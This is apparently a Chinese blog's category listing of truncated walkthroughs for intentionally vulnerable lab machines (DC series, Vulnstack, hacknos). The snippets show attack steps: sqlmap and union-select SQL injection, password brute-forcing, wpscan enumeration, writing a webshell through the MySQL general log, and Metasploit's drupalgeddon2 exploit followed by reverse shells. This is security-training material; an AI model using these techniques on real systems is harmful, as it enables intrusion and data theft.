![](https://img-blog.csdnimg.cn/20201014180756930.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
靶机实战
文章平均质量分 60
进行实战,熟悉巩固知识!!!
Hero.Youth
这个作者很懒,什么都没留下…
展开
-
DC靶机系列-----9
信息收集nmap -sP 192.168..目标开放80端口,进行访问;然后在进行目录的收集:并没什么用。。。。。在浏览网页时,发现有用户信息:得到用户信息后,在查询功能处进行查询:有错误的回显,可能存在SQL注入;使用sqlmap进行验证:获得数据库名;接着进行表和数据的获取:sqlmap.py -r C:\Users\Dell\Desktop\test.txt -p search -D users -tablessqlmap.py -r C:\User原创 2021-07-28 15:33:25 · 235 阅读 · 0 评论 -
DC靶机-----8
信息收集进行目标的IP查询进行目标的访问看到了SQL注入的注入点,进行尝试:union select group_concat(0x7e,table_name) from information_schema.tables where table_schema=database()获取用户与密码;获取交互式shell:提权进行脚本的使用:参考文章:https://www.freesion.com/article/92351385482/原创 2021-06-14 16:08:21 · 144 阅读 · 2 评论 -
Me-and-My-Girlfriend 靶机
信息收集nmap -sP 192.168.1.1-254查看源码原创 2021-06-11 22:32:22 · 288 阅读 · 0 评论 -
DC靶机系列------6
进行信息收集对目标进行ip扫描arp-scan –interface eth0 192.168.1.0/24进行目标的访问:发现输入IP之后会跳到wordy,在本地和kali中的host文件中进行配置;进行目标的目录收集:在进行目标网页翻看时,看到是wordpress,使用wpscan --url http://wordy/ -e wpscan --ignore-main-redirect --url 192.168.1.45 --enumerate u --for原创 2021-06-01 14:20:34 · 82 阅读 · 0 评论 -
DC靶机系列------5
进行信息收集进行目标的ip扫描:arp-scan –interface eth0 192.168.1.0/24进行目标开放端口的扫描:nmap -A 192.168.1.135目标开放80端口,进行目标的访问:在进行目标浏览的时候,发现存在一个留言板,进行留言:留言之后,发现下方发生了变化!!在提交了留言之后,在url地址栏中可以看到,是GET方式,于是突发奇想,试试文件包含:没想到竟然成功了!!!因为没有文件上传的点,所以在日志中看看能否利用日志来进行一原创 2021-05-31 22:13:18 · 79 阅读 · 0 评论 -
DC靶机系列------4
进行目标主机的ip扫描:namp -sP 192.168.1.1-254进行开放端口的扫描:nmap -A 192.168.1.205进行访问:利用BP进行用户名与密码的爆破:爆破后:用户名;admin 密码:happy原创 2021-05-30 11:29:09 · 118 阅读 · 1 评论 -
Vulnstack(1)
信息收集进行ip的扫描以及开放端口的探测:扫描到有80端口,进行访问:尝试在phpstuday中能获得的信息,发现有输入框,尝试弱口令:发现可以登录,进行目录后台的扫描:发现有phpmyadmin目录,进行登录:然后尝试写入一句话木马来获取shell:show variables like '%general%'; #查看日志状态SET GLOBAL general_log='on' #开启generalset global general原创 2021-05-25 17:28:03 · 287 阅读 · 0 评论 -
DC靶机系列------3
一、进行DC3的配置二、利用kali进行ip的扫描;在进行开放端口的扫描:开放端口只有80端口,而且之joomal cms;在进行目录的扫描:然后使用joomscan进行利用joomscan安装与使用:https://www.freebuf.com/sectool/181440.htmlperl joomscan.pl ‐u http://192.168.1.166同时也得到了joomal 版本与目录然后利用joomla 3.7的漏洞;发现Joomla版本号.原创 2021-05-20 23:36:55 · 147 阅读 · 0 评论 -
hacknos靶机-----1
进行虚拟机的安装 参考文档:https://www.w3xue.com/exp/article/20212/69978.html接下来开始操作一、利用kali自带的nmap进行ip的扫描在进行开放端口的扫描:在本地的浏览器进行访问,成功!接下来进行目录的扫描:进行敏感文件的查看,得到了drupal的版本,然后利用msf进行操作:拿到shell之后,开始进行提权;生成密码,在kali本地进行下载:然后在靶机的操作界面中输入:python3 -c 'impo.原创 2021-05-19 22:43:06 · 115 阅读 · 0 评论 -
DC靶机系列-------2
一、扫描ip地址直接查看无法查看,所以在kali中的hosts中进行配置二、flag中提示用cewl,使用cewl生成字典进行爆破;三、使用wpscan进行当前用户的扫描:wpscan --url http://dc-2wpscan --url http://dc-2/ -e四、漏洞攻击利用wpscan来进行密码的爆破;先将之前爆破的用户与之前在页面的flag作的密码结合进行爆破touch username.txtvim username.txtwpsc.原创 2021-05-18 22:30:48 · 94 阅读 · 0 评论 -
DC靶机系列----1
一、使用kali中nmap进行ip扫描:二、三、进行robots文件的查看:四 、进行敏感文件的查看,发现:五、漏洞利用:寻找Drupal 7.0版本并且进行漏洞利用;msfconsolesearch drupaluse exploit/unix/webapp/drupal_drupalgeddon2show optionsset rhost 192.168.1.119run反弹shell:使用pyhton进行交互式反弹shell:python -c “i.原创 2021-05-17 22:27:13 · 142 阅读 · 0 评论